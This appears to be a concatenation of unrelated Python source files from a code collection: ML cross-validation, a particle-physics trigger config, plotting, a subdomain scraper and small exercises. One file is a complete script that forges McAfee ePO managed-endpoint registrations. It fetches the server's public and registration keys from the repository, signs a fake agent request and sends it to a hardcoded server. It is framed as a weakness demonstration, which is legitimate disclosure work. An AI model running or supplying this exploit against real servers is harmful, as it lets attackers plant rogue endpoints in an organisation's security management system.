C = [1, 0.1, 0.01, 0.001, 0.0001, 0.00001]
kernels = ['poly', 'linear']
degrees = range(2, 5)
# NOTE(review): this is a ragged nested *list*, yet it is indexed below
# with a 4-tuple (`[version, c, k, d-1]`), which raises TypeError — a
# dict keyed by the tuple (or a numpy object array) was likely intended.
cross_validated_values = [[0] * 3, [0] * len(C), [0] * 2, [0] * 4]
for design_matrix_version in range(3):
    for c in range(len(C)):
        for k in range(len(kernels)):
            if kernels[k] == 'poly':
                for d in degrees:
                    current_model_accuracies = []
                    for train_indices, test_indices in kf:
                        X_train, X_test = X[train_indices, :], X[
                            test_indices, :]
                        y_train, y_test = y[train_indices], y[test_indices]
                        if design_matrix_version == 0:
                            transformer = TfidfTransformer()
                            X_train = transformer.fit_transform(X_train)
                            X_test = transformer.transform(X_test)
                        elif design_matrix_version == 1:
                            X_train, X_test = X_train.astype(
                                float), X_test.astype(float)
                            X_train = normalize(X_train, axis=1, norm='l1')
                            X_test = normalize(X_test, axis=1, norm='l1')
                        # NOTE(review): `d` iterates the degree *values*
                        # (2..4), so degrees[d] is wrong (degrees[4] is an
                        # IndexError); `degree=d` was likely intended.
                        model = svm.Classifier(X_train,
                                               y_train,
                                               C=C[c],
                                               kernel=kernels[k],
                                               degree=degrees[d])
                        # NOTE(review): `lemmatize_version` is undefined.
                        print design_matrix_version, lemmatize_version, c, k, "deg = %d" % d
                        model.train()
                        print "previous values worked"
                        predicted_y = model.predict(X_test)
                        current_model_accuracies.append(accuracy_score(
                            y_test, predicted_y))
                    cross_validated_values[design_matrix_version, c, k, d -
                                           1] = (np.mean(np.array(
                                               current_model_accuracies)), model)
            else: #if kernel is either linear or rbf we dont iterate over degree
                current_model_accuracies = []
                for train_indices, test_indices in kf:
                    X_train, X_test = X[train_indices, :], X[test_indices, :]
                    y_train, y_test = y[train_indices], y[test_indices]
                    if design_matrix_version == 0:
                        transformer = TfidfTransformer()
                        X_train = transformer.fit_transform(X_train)
                        X_test = transformer.transform(X_test)
                    elif design_matrix_version == 1:
                        X_train, X_test = X_train.astype(float), X_test.astype(
                            float)
                        X_train = normalize(X_train, axis=1, norm='l1')
                        X_test = normalize(X_test, axis=1, norm='l1')
                    model = svm.Classifier(X_train,
                                           y_train,
                                           C=C[c],
                                           kernel=kernels[k])
                    print(design_matrix_version, lemmatize_version, c, k)
                    model.train()
                    print "previous values worked"
                    predicted_y = model.predict(X_test)
                    current_model_accuracies.append(accuracy_score(
                        y_test, predicted_y))
                cross_validated_values[design_matrix_version, c, k,
                                       0] = (np.mean(np.array(
                                           current_model_accuracies)), model)
# Persist all (mean accuracy, model) results for later inspection.
pickle.dump(cross_validated_values, open('svm_cross_validated_values.pkl',
                                         'w+'))
|
17,040 | 316557081de965fd39f17460ff7d2165c75618a1 | import numpy as np
import random
a = [1, 2, 4, 5, 3, 4, 5, 6, 7, 6, 5, 2, 1]
# NOTE(review): range(1, 2) contains only the value 1, so this "random"
# choice is always 1 — confirm whether a wider range was intended.
li = np.random.choice(range(1, 2))
print(li)
17,041 | 5ab105aebd33987f1da198ffa0e15533eb4ca434 | # Auto generated configuration file
# using:
# Revision: 1.207
# Source: /cvs_server/repositories/CMSSW/CMSSW/Configuration/PyReleaseValidation/python/ConfigBuilder.py,v
# with command line options: l1test -s DIGI,L1,DIGI2RAW,HLT:HIon --conditions auto:mc --no_exec
import FWCore.ParameterSet.Config as cms
# CMSSW process configuration: re-runs HLT trigger analysis ('HLT2') over
# heavy-ion W->MuNu MC samples and feeds them to the HLTrgAna analyzer.
process = cms.Process('HLT2')
process.load('Configuration.StandardSequences.Services_cff')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load("Configuration.StandardSequences.MagneticField_cff")
process.load("Configuration.Geometry.GeometryIdeal_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
# Conditions global tag for the 5.3X heavy-ion startup scenario.
process.GlobalTag.globaltag = 'STARTHI53_V28::All'
process.load("Configuration.StandardSequences.Reconstruction_cff")
#process.load("HLTrigger.Configuration.HLT_PIon_cff")
from HeavyIonsAnalysis.Configuration.CommonFunctions_cff import *
overrideCentrality(process)
process.HeavyIonGlobalParameters = cms.PSet(
    centralityVariable = cms.string("HFtowersPlusTrunc"),
    nonDefaultGlauberModel = cms.string(""),
    centralitySrc = cms.InputTag("pACentrality")
)
process.load('RecoHI.HiCentralityAlgos.HiCentrality_cfi')
process.options = cms.untracked.PSet(
    wantSummary=cms.untracked.bool(True),
    SkipEvent = cms.untracked.vstring('ProductNotFound')
)
# PAT muons matched to trigger objects, with L1 matching tuned for singlets.
process.load("MuonAnalysis.MuonAssociators.patMuonsWithTrigger_cff")
from MuonAnalysis.MuonAssociators.muonL1Match_cfi import *
muonL1Match.matched = cms.InputTag("hltL1extraParticles")
from MuonAnalysis.MuonAssociators.patMuonsWithTrigger_cff import *
useL1MatchingWindowForSinglets(process)
changeTriggerProcessName(process, "HLT") # DATA Mix
patMuonsWithoutTrigger.pvSrc = cms.InputTag("hiSelectedVertex") # Heavy Ion vertex collection
# HLT dimuon trigger
import HLTrigger.HLTfilters.hltHighLevel_cfi
process.hltZMMHI = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone()
#process.hltZMMHI.TriggerResultsTag = cms.InputTag("TriggerResults","","HLT2") # signal
process.hltZMMHI.TriggerResultsTag = cms.InputTag("TriggerResults","","DATAMIX") # DATA Mix
process.hltZMMHI.HLTPaths = ["HLT_HIL2Mu20"]
process.hltZMMHI.throw = False
process.hltZMMHI.andOr = True
process.maxEvents = cms.untracked.PSet(
    input = cms.untracked.int32(-1)
)
# Input source
process.source = cms.Source("PoolSource",
    #skipEvents = cms.untracked.uint32(0),
    duplicateCheckMode = cms.untracked.string('noDuplicateCheck'),
    fileNames = cms.untracked.vstring(
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_1.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_2.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_3.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_4.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_5.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_6.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_7.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_8.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_9.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_10.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_11.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_12.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_13.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_14.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_15.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_16.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_17.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_18.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_19.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_20.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_21.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_22.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_23.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_24.root",
        "/store/user/dmoon/cms538HI/WMuNu_MC_5.02TeV/Onia2MuMu_2ndL1/WMuNu_MC_5.02TeV_Onia2MuMu_25.root",
    ),
)
# Trigger-efficiency analyzer: compares L1/L2/L3/HLT muon candidates
# against generator-level and reconstructed muons.
process.analyzer = cms.EDAnalyzer('HLTrgAna',
    genSource = cms.untracked.InputTag("hiGenParticles"),
    L1MuCands = cms.untracked.InputTag("l1extraParticles"),
    #L1MuCands = cms.untracked.InputTag("hltL1extraParticles"),
    L2MuCands = cms.untracked.InputTag("hltL2MuonCandidates"),
    L3MuCands = cms.untracked.InputTag("hltL3MuonCandidates"),
    gtObjects = cms.untracked.InputTag("gtDigis"),
    #gtObjects = cms.untracked.InputTag("hltGtDigis"),
    vertex = cms.untracked.InputTag("offlinePrimaryVertices"),
    #vertex = cms.untracked.InputTag("hltPixelVertices"),
    BeamSpot = cms.untracked.InputTag("BeamSpot"),
    TriggerResults = cms.InputTag("TriggerResults","","HLT"),
    #TriggerResults = cms.InputTag("TriggerResults","","HLT1"),
    #TriggerResults = cms.InputTag("TriggerResults","","DATAMIX"),
    muTrackTag = cms.InputTag("globalMuons"),
    muontag = cms.untracked.InputTag("muons"),
    staMuonsTag = cms.InputTag("standAloneMuons","UpdatedAtVtx"),
    patMuonsTag = cms.InputTag("patMuonsWithTrigger"),
    hOutputFile = cms.untracked.string("HLTrgAna_RelVal_JpsiMM.root"),
    doMC = cms.bool(True),
    doHiMC = cms.bool(False),
    doSIM = cms.bool(False),
    doL1Bit = cms.bool(True),
    doL1 = cms.bool(True),
    doL2 = cms.bool(True),
    doL3 = cms.bool(True),
    doHLT = cms.bool(True),
    doRECO = cms.bool(True),
    doREGIT = cms.bool(True),
    TrgClass = cms.untracked.int32(0), # 0 : PbPb, 1 : pPb
    NoTrg = cms.untracked.int32(16), # No of Trg
    doCentrality = cms.bool(False),
    doPAT = cms.bool(False),
)
process.totalAnalyzer = cms.Path(process.analyzer)
|
17,042 | 2895bbc82b9099f7251ab83b7298c786bb658387 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''=================================================
@Project -> File :locust -> test.py
@IDE :PyCharm
@Author :Mr. XieYueLv
@Date :2021/8/15 1:04
@Desc :
=================================================='''
# import time
#
# now_time_stamp = time.time()
# print(now_time_stamp)
# time_data = time.ctime(now_time_stamp)
# print(type(time_data))
# print(time_data.split(" ")[3])
# import requests
# res = requests.sessions.session()
# def login():
# url = "http://192.168.48.141:8282/login"
# data = {"username": "lock", "password": "opms123456"}
# ress = res.post(url=url, data=data)
# return ress.json()
#
#
# def add_project():
# url = "http://192.168.48.141:8282/project/add"
# data = {"name": "xieyuelv",
# "aliasname": "谢谢",
# "started": "2021-08-23",
# "ended": "2021-08-23",
# "desc": "test",
# "id": 0}
# login()
# ress = res.post(url=url,data=data)
# return ress.json()
#
# # lg = login()
# # print(lg)
# # get_manager()
# ap = add_project()
# print(ap)
# k = 1000
# sum = 0
# while k > 1:
# print(k)
# k = k / 2
# print(sum)
# import re
# str1 = "Python's features"
# str2 = re.match(r'(.*)on(.*?).*',str1)
# print(str2.group(1))
# def adder(x):
# def wrapper(y):
# return x + y
# return wrapper
# adder5 = adder(5)
# print(adder5(adder5(6)))
# b1 = [1,2,3]
# b2 = [2,3,4]
# b3 = [val for val in b1 if val in b2]
# print(b3)
# import re
#
# line = "Cats are smarter than dogs"
# print(re.match('(.*?) are (.*?) than (.*)',line).group(2))
#获取并打印google首页的html
# import urllib.request
# # response=urllib.request.urlopen('http://123.56.170.43:7272/')
# # html=response.read()
# # print(html)
# url = "http://123.56.170.43:7272/"
# re_sp = urllib.request.Request(url=url).get_header("headers")
# print(re_sp)
# a = {"a":1}
# print(a['a'])
#
# b = [8,3,2,6,19,7]
# b.reverse()
# print(b)
# b.sort(reverse=True)
# print(b)
#-*-coding:utf-8-*-
# Time:2017/9/21 19:02
# Author:YangYangJun
# from openpyxl import Workbook
# from openpyxl.reader.excel import load_workbook
#
# import os
# import time
#
#
#
# def writeExcel():
# # 获取文件路径
# excelPath = os.path.join(os.getcwd(), 'ExcelData')
# print ("****")
# print (excelPath)
# # 定义文件名称
# # invalid mode ('wb') or filename: 'Excel2017-09-21_20:15:57.xlsx' 这种方式明明文件,会提示保存失败,无效的文件名。
# # nameTime = time.strftime('%Y-%m-%d_%H:%M:%S')
# nameTime = time.strftime('%Y-%m-%d_%H-%M-%S')
# excelName = 'Excel' + nameTime + '.xlsx'
# ExcelFullName= os.path.join(excelPath,excelName)
# print (ExcelFullName)
#
# wb = Workbook()
#
# ws = wb.active
#
# tableTitle = ['userName', 'Phone', 'age', 'Remark']
#
# # 维护表头
# # if row < 1 or column < 1:
# # raise ValueError("Row or column values must be at least 1")
# # 如上,openpyxl 的首行、首列 是 (1,1)而不是(0,0),如果坐标输入含有小于1的值,提示 :Row or column values must be at least 1,即最小值为1.
# for col in range(len(tableTitle)):
# c = col + 1
# ws.cell(row=1, column=c).value = tableTitle[col]
#
# # 数据表基本信息
# tableValues = [['张学友', 15201062100, 18, '测试数据!'], ['李雷', 15201062598, 19, '测试数据!'],['Marry', 15201062191, 28, '测试数据!']]
#
# for row in range(len(tableValues)):
# ws.append(tableValues[row])
# #wb.save(ExcelFullName)
# wb.save(filename=ExcelFullName)
# return ExcelFullName
#
# def readExcel(ExcelFullName):
# wb = load_workbook(ExcelFullName)
# #wb = load_workbook(filename=ExcelFullName)
#
# # 获取当前活跃的worksheet,默认就是第一个worksheet
# #ws = wb.active
# # 当然也可以使用下面的方法
# # 获取所有表格(worksheet)的名字
# sheets = wb.get_sheet_names()
# print (sheets)
# # # 第一个表格的名称
# sheet_first = sheets[0]
# # # 获取特定的worksheet
# #
# ws = wb.get_sheet_by_name(sheet_first)
# print ("***")
# print (sheet_first)
# print (ws.title)
# print ("^^^")
# # 获取表格所有行和列,两者都是可迭代的
#
# rows = ws.rows
# print (rows)
#
# columns = ws.columns
#
# # 迭代所有的行
#
# for row in rows:
#
# line = [col.value for col in row]
#
# print (line)
#
# # 通过坐标读取值
#
# print (ws['A1'].value) # A表示列,1表示行
#
# print (ws.cell(row=1, column=1).value)
#
# if __name__ == '__main__':
# ExcelFullName = writeExcel()
# readExcel(ExcelFullName)
# 检查两个字符串的组成元素是否一样
# from collections import Counter
# def diff(one, two):
# return Counter(one) == Counter(two)
#
# print(diff("asd","asd1"))
#
# # 打印N次字符串
# n = 3
# s = "我的fauk\n"
# print(s * n)
#
# # 大写第一个字母
# a = "我的-as dsa"
# print(a.title())
import random
# Demonstrate three common random-selection helpers.
print(random.randint(1, 1000))        # uniform integer in [1, 1000]
print(random.choice("asdfghjk"))      # one character from the string
print(random.sample("asdfgqwer", 3))  # three distinct characters
|
17,043 | f31bb5e56bbec825426f15fc9e4664b4811f2488 | import numpy as np
import matplotlib.pyplot as plt
# Pareto fronts from three optimization runs; column 0 is the (negated)
# frequency objective in Hz, column 1 is stiffness in N/m.
front1 = np.load('solutions-off-resonance/prelim-1a-front.npy')
front2 = np.load('solutions-off-resonance/prelim-1b-front.npy')
front3 = np.load('solutions-off-resonance/prelim-1c-front.npy')


def _plot_fronts(xlim, ylim):
    """Scatter the three fronts (frequency in kHz vs stiffness).

    Deduplicates the previously copy-pasted plotting section; the first
    objective is stored negated in Hz, hence the -x * 1e-3 conversion.
    """
    fig, ax = plt.subplots()
    for front, color, label in (
        (front1, 'b', 'Low Detail'),
        (front2, 'r', 'High Detail'),
        (front3, 'g', 'Rectangular'),
    ):
        ax.scatter(-front[:, 0] * 1e-3, front[:, 1], c=color, label=label)
    ax.set_xlabel('Frequency (kHz)')
    ax.set_ylabel('Stiffness (N/m)')
    ax.set_ylim(0, ylim)
    ax.set_xlim(0, xlim)
    ax.legend()
    return fig, ax


# Full-range view, then a zoomed-in view of the same data.
fig, ax = _plot_fronts(xlim=10000, ylim=6000)
fig, ax = _plot_fronts(xlim=100, ylim=50)
|
17,044 | 354542acfe1a0d7543b8f6386fddd1bf6f982397 | # -*- coding:utf-8 -*-
# !/usr/bin/env python
import re
import traceback
from lib.common import HttpReq, CheckDomainFormat
def get_subdomains(domain):
    """Scrape alexa.chinaz.com for subdomains of *domain*.

    Returns a deduplicated list of subdomains that pass
    CheckDomainFormat; returns an empty list on any failure.
    """
    subdomains = []
    try:
        url = 'http://alexa.chinaz.com/?domain={}'.format(domain)
        _, content = HttpReq(url)
        regex = re.compile(r'(?<="\>\r\n<li>).*?(?=</li>)')
        result = regex.findall(content)
        subdomains = [sub for sub in result if CheckDomainFormat(sub)]
    except TypeError:
        # NOTE(review): presumably HttpReq returns None on failure,
        # making the tuple unpack raise TypeError — treated as "no results".
        pass
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # still propagate; unexpected errors are logged for debugging.
        traceback.print_exc()
    # Moved out of `finally`: returning from a finally block silently
    # swallows any in-flight exception.
    return list(set(subdomains))
|
17,045 | e392a65ba10bcc3cc18156bf57d4d23dd18c6c91 | from chat import create_app
# Create the application instance.
app = create_app()
17,046 | e6ba343434ef2d1285775e7d4e598fb5882ff02e | print'LAB02, Question 4'
print''
i = 0
# NOTE(review): with i starting at 0, `i > 10` is False immediately, so
# the loop body never runs and nothing is printed before the final line —
# contradicting its "infinite loop" claim. `while i < 10` (finite) or
# `while i >= 0` (truly infinite) was probably intended; confirm against
# the assignment text. (Python 2 syntax throughout.)
while i > 10:
    i += 1
    if i%2 == 0:
        print i
print 'this is an infinite loop'
|
17,047 | 0049ed90bbd78398412f64c19d1cbfeaa418f327 | #!/usr/bin/env python3
""" EPO Managed Endpoint Inject - Script to demonstrate weakness in EPO managed endpoint registration mechanism to allow arbitrary managed endpoint registration.
By design, McAfee ePO server exposes server public key and server registration key via Master Repository. These two keys can be downloaded by anyone and used to construct endpoint registration message or send events.
Tested and Confirmed on EPO 4.x/5.x
Harry Phung - harryuts\@\gmail.com
V1.0
"""
import struct
import mcafee_crypto
import endpoint
import socket
import argparse
from base64 import b64encode
import urllib.request
import ssl
class Build_Registration_Request:
"""Class for building registration request"""
def __init__(self, epo_url, agent_guid, transaction_guid, agent_hostname, agent_mac_address):
self.epo_url = epo_url
self.agent_guid = agent_guid
self.agent_hostname = agent_hostname
self.transaction_guid = b'{%s}' % transaction_guid
self.agent_mac_address = agent_mac_address
self.serverkeyhash = b''
self.regkey = b''
self.header_1 = b''
self.header_2 = b''
self.fullprops_xml = b''
self.register_request = b''
self.agent_pubkey_epo_format = b''
self.epo = None
self.setup()
def getfilehttps(self, url):
"""Download file via https"""
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
response = urllib.request.urlopen(url, context=ctx)
result = response.read()
return result
def setup(self):
"""Build server keyhash and generate agent key"""
self.build_serverkeyhash()
self.build_agent_pubkey()
self.load_registration_key()
def build_serverkeyhash(self):
"""Build server key hash based on server public key"""
server_publickey = self.getfilehttps(self.epo_url + "srpubkey.bin")
self.serverkeyhash = b64encode(mcafee_crypto.SHA1(server_publickey))
return self.serverkeyhash
def build_agent_pubkey(self):
"""Generate Agent Public Key"""
self.agent_pubkey_epo_format = mcafee_crypto.generate_DSA_agentkey()
def load_registration_key(self):
"""Build registration key to correct format expected by ePO"""
key = self.getfilehttps(self.epo_url + "reqseckey.bin")
reqseckey_p = int(key[2:130].hex(),16)
reqseckey_q = int(key[132:152].hex(),16)
reqseckey_g = int(key[154:282].hex(),16)
reqseckey_pub = int(key[284:412].hex(),16)
reqseckey_priv = int(key[415:435].hex(),16)
dsa_key = (reqseckey_pub, reqseckey_g, reqseckey_p, reqseckey_q, reqseckey_priv)
self.regkey = dsa_key
def build_header_1(self, header_len=b'\x00\x00\x00\x00', data_len=b'\x00\x00\x00\x00'):
"""Build header 1 in request"""
self.header_1 = b''
header_1_dict = {'preamble': b'\x50\x4f',
'packet_type': b'\x01\x00\x00\x50',
'header_len': header_len + b'\x02\x00\x00\x00\x00\x00\x00\x00',
'data_len': data_len,
'agent_guid': b'{%s}' % self.agent_guid,
'agent_guid_padding': b'\x00' * 90 + b'\x01\x00\x00\x00',
'agent_hostname': b'%s' % self.agent_hostname,
'hostname_padding': b'\x00' * (32 - len(self.agent_hostname)) + b'\x00' * 48}
for item in header_1_dict:
self.header_1 += header_1_dict[item]
return self.header_1
def build_header_2_40(self):
"""Build header 2 in request"""
self.header_2 = b'\x0e\x00\x00\x00AssignmentList\x01\x00\x00\x000' + \
(b'\x0c\x00\x00\x00ComputerName' + len(self.agent_hostname).to_bytes(4, 'little') + self.agent_hostname) + \
(b'\n\x00\x00\x00DomainName\t\x00\x00\x00WORKGROUP'
b'\x12\x00\x00\x00EventFilterVersion\x01\x00\x00\x000'
b'\x19\x00\x00\x00GuidRegenerationSupported\x01\x00\x00\x001'
b'\t\x00\x00\x00IPAddress\x0f\x00\x00\x00192.168.236.199') + \
b'\n\x00\x00\x00NETAddress' + len(self.agent_mac_address).to_bytes(4, 'little') +self.agent_mac_address + \
(b'\x0b\x00\x00\x00PackageType\x0b\x00\x00\x00AgentPubKey'
b'\n\x00\x00\x00PlatformID\n\x00\x00\x00W2KW:5:0:4'
b'\r\x00\x00\x00PolicyVersion\x01\x00\x00\x000'
b'\x0c\x00\x00\x00PropsVersion\x0e\x00\x00\x0020170724000500'
b'\x0e\x00\x00\x00SequenceNumber\x01\x00\x00\x003') + \
b'\r\x00\x00\x00ServerKeyHash' + len(self.serverkeyhash).to_bytes(4, 'little') + self.serverkeyhash + \
(b'\x0f\x00\x00\x00SiteinfoVersion\x01\x00\x00\x000'
b'\x15\x00\x00\x00SupportedSPIPEVersion\x0b\x00\x00\x003.0;4.0;5.0'
b'\x0b\x00\x00\x00TaskVersion\x01\x00\x00\x000') + \
b'\x0f\x00\x00\x00TransactionGUID' + len(self.transaction_guid).to_bytes(4, 'little') + self.transaction_guid
return self.header_2
def build_fullprops(self):
"""Build endpoint properties"""
fullprops_xml = (b'<?xml version="1.0" encoding="UTF-8"?><ns:naiProperties xmlns:ns="naiProps" FullProps="true" PropsVersion="20170724000500" '
b'MachineID="{%s}" MachineName="%s">'
b'<ComputerProperties>'
b'<PlatformID>W2KW:5:0:4</PlatformID><ComputerName>%s</ComputerName>'
b'<ComputerDescription>N/A</ComputerDescription>'
b'<CPUType>Big Ass Mainframe</CPUType>'
b'<NumOfCPU>I dont know</NumOfCPU>'
b'<CPUSpeed>I got no idea</CPUSpeed>'
b'<OSType>Windows 2000</OSType>'
b'<OSBitMode>0</OSBitMode>'
b'<OSPlatform>Professional</OSPlatform>'
b'<OSVersion>5.0</OSVersion>'
b'<OSBuildNum>2195</OSBuildNum>'
b'<OSCsdVersion>Service Pack 4</OSCsdVersion>'
b'<TotalPhysicalMemory>2146938880</TotalPhysicalMemory>'
b'<FreeMemory>1896656896</FreeMemory>'
b'<TimeZone>Eastern Standard Time</TimeZone>'
b'<DefaultLangID>0409</DefaultLangID>'
b'<EmailAddress>W2KW</EmailAddress>'
b'<CPUSerialNumber>I dont know</CPUSerialNumber>'
b'<OSOEMId>51873-OEM-0003972-38082</OSOEMId>'
b'<LastUpdate>01/14/9999 20:05:00</LastUpdate>'
b'<UserName>Administrator</UserName>'
b'<DomainName>WORKGROUP</DomainName>'
b'<IPHostName>%s</IPHostName>'
b'<IPXAddress>N/A</IPXAddress>'
b'<Total_Space_of_Drive_C>20471.00</Total_Space_of_Drive_C>'
b'<Free_Space_of_Drive_C>16777.00</Free_Space_of_Drive_C>'
b'<NumOfHardDrives>1</NumOfHardDrives>'
b'<TotalDiskSpace>20471.00</TotalDiskSpace>'
b'<FreeDiskSpace>16777.00</FreeDiskSpace>'
b'<IPAddress>192.168.236.199</IPAddress>'
b'<SubnetAddress>192.168.236.0</SubnetAddress>'
b'<SubnetMask>255.255.255.0</SubnetMask>'
b'<NETAddress>000C2923AC18</NETAddress>'
b'<IsPortable>0</IsPortable>'
b'</ComputerProperties>'
b'<ProductProperties SoftwareID="PCR_____1000" delete="false">'
b'<Section name="General">'
b'<Setting name="szInstallDir">C:\\Program Files\\McAfee\\Common Framework</Setting>'
b'<Setting name="PluginVersion">9.0.0.1532</Setting>'
b'<Setting name="Language">0000</Setting>'
b'</Section>'
b'</ProductProperties><ProductProperties SoftwareID="EPOAGENT3000" delete="false">'
b'<Section name="General">'
b'<Setting name="szInstallDir">C:\\Program Files\\McAfee\\Common Framework</Setting>'
b'<Setting name="PluginVersion">9.0.0.1532</Setting>'
b'<Setting name="Language">0409</Setting>'
b'<Setting name="ServerKeyHash">%s</Setting>'
b'<Setting name="AgentGUID">{%s}</Setting>'
b'<Setting name="szProductVer">9.0.0.1532</Setting>'
b'<Setting name="bEnableSuperAgent">0</Setting>'
b'<Setting name="bEnableSuperAgentRepository">0</Setting>'
b'<Setting name="VirtualDirectory"></Setting>'
b'<Setting name="bEnableAgentPing">1</Setting>'
b'<Setting name="AgentBroadcastPingPort">8082</Setting>'
b'<Setting name="AgentPingPort">8081</Setting>'
b'<Setting name="ShowAgentUI">0</Setting>'
b'<Setting name="ShowRebootUI">1</Setting>'
b'<Setting name="RebootTimeOut">-1</Setting>'
b'<Setting name="PolicyEnforcementInterval">5</Setting>'
b'<Setting name="CheckNetworkMessageInterval">60</Setting>'
b'</Section>'
b'</ProductProperties>'
b'</ns:naiProperties>' \
% (self.agent_guid, self.agent_hostname, self.agent_hostname, self.agent_hostname, self.serverkeyhash, self.agent_guid))
self.fullprops_xml = b'\x02\x00\x09\x00' + b'Props.xml' + struct.pack('<I', len(fullprops_xml)) + fullprops_xml
return self.fullprops_xml
def build_request(self):
"""Build registration request data """
self.build_header_2_40()
self.build_fullprops()
data_compressed = mcafee_crypto.mcafee_compress(self.agent_pubkey_epo_format + self.fullprops_xml)
data_len = struct.pack('<I', len(data_compressed))
final_header_len = struct.pack('<I', len(self.build_header_1()) + len(self.build_header_2_40()))
self.build_header_1(final_header_len, data_len)
final_header_1 = mcafee_crypto.xor_c(self.header_1)
request_signature = mcafee_crypto.dsa_sign(self.regkey, self.header_1 + self.header_2 + data_compressed)
data_encrypted = mcafee_crypto.mcafee_3des_encrypt(self.header_2 + data_compressed + request_signature)
post_data = mcafee_crypto.xor_c(final_header_1) + data_encrypted
return post_data
def send_request(self):
post_data = self.build_request()
http_req = b'POST /spipe/pkg?AgentGuid={%s}' % self.agent_guid \
+ b'&Source=Agent_3.0.0 HTTP/1.0\r\nAccept: application/octet-stream\r\nAccept-Language: en-us\r\n' \
+ b'User-Agent: Mozilla/4.0 (compatible; SPIPE/3.0; Windows)\r\nHost: EPO59.laptoplab.local\r\n' \
+ b'Content-Length: %d\r\nContent-Type: application/octet-stream\r\n\r\n' % len(post_data) \
+ post_data
try:
self.epo = socket.socket()
self.epo = ssl.wrap_socket(self.epo)
self.epo.settimeout(1)
print(self.agent_hostname)
self.epo.connect(('192.168.0.245', 443))
self.epo.send(http_req)
except socket.error:
print('Error connect to ePo server')
try:
receive_data = self.epo.recv(8192)
if len(receive_data) > 0:
server_response_code = receive_data[0: receive_data.find(b'\r\n')]
print(server_response_code)
else:
print('Server closes the connection')
except socket.error:
print('socket error')
def main():
    """Parse CLI arguments and register one spoofed endpoint with the ePO server."""
    arg_parser = argparse.ArgumentParser(description='Python EPO Agent')
    arg_parser.add_argument('target', type=str, help='Target EPO Server or Agent Handler IP Address')
    arg_parser.add_argument('--port', type=int, default=443, help='Secure ASIC Port, default=443')
    # parser.add_argument('action', choices=['Register'], help='Action to perform. Supported Action: Register')
    parsed = arg_parser.parse_args()

    # Master Repository URL exposing the server public/registration keys.
    repo_url = "https://{}:{}/Software/Current/EPOAGENT3000/Install/0409/".format(parsed.target, parsed.port)

    guid = endpoint.generate_GUID().encode()
    hostname = endpoint.generate_hostname().encode()
    mac_address = endpoint.generate_MAC().encode()

    print("Registering endpoint: {}".format(hostname.decode()))
    request = Build_Registration_Request(repo_url, guid, guid, hostname, mac_address)
    request.send_request()


if __name__ == "__main__":
    main()
|
17,048 | be8166d3a9bdad64e979687dc9a2d4e111c38421 | n = int(input())
# Read n "matricula grade" pairs from stdin and print the matricula of the
# highest grade when it reaches at least 8, otherwise a failure message.
maior = 0
